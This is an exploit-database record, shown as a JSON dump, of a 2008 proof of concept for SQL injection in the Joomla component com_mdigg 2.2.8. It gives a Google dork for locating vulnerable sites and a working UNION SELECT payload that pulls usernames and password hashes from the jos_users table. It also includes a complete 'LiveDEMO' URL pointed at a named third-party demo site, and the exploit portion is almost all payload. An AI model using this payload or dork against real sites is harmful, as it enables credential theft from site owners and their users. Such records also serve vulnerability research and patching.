Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln

2008-12-25T00:00:00

Description

No description provided by source.

{"sourceData": "\n #############################################################\r\nJoomla Component com_mdigg(category) SQL-injection vulnerability\r\n#############################################################\r\n\r\n###################################################\r\n#[~] Author : boom3rang \r\n#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.\r\n#[~] Vulnerability : SQL injection \r\n#[~] Google Dork : inurl:com_mdigg \r\n--------------------------------------------------\r\n#[!] Name : mdigg\r\n#[!] CreationDate : 10-12-2007\r\n#[!] Author : Zhigang Lei\r\n#[!] AuthorEmail : zhigang.lei@gmail.com \r\n#[!] Version : 2.2.8 \r\n###################################################\r\n\r\nExample:\r\nhttp://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]\r\n\r\nExploit:\r\n-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*\r\n\r\nLiveDEMO:\r\nhttp://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*\r\n\r\n##############################\r\n#[!] Proud 2 be Albanian\r\n#[!] Proud 2 be Muslim\r\n#[!] United States of Albania\r\n##############################\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-10328", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-10328", "type": "seebug", "viewCount": 8, "references": [], "lastseen": "2017-11-19T19:04:44", "published": "2008-12-25T00:00:00", "cvelist": [], "id": "SSV:10328", "enchantments_done": [], "modified": "2008-12-25T00:00:00", "title": "Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647467970, "score": 1659785532, "epss": 1678851499}}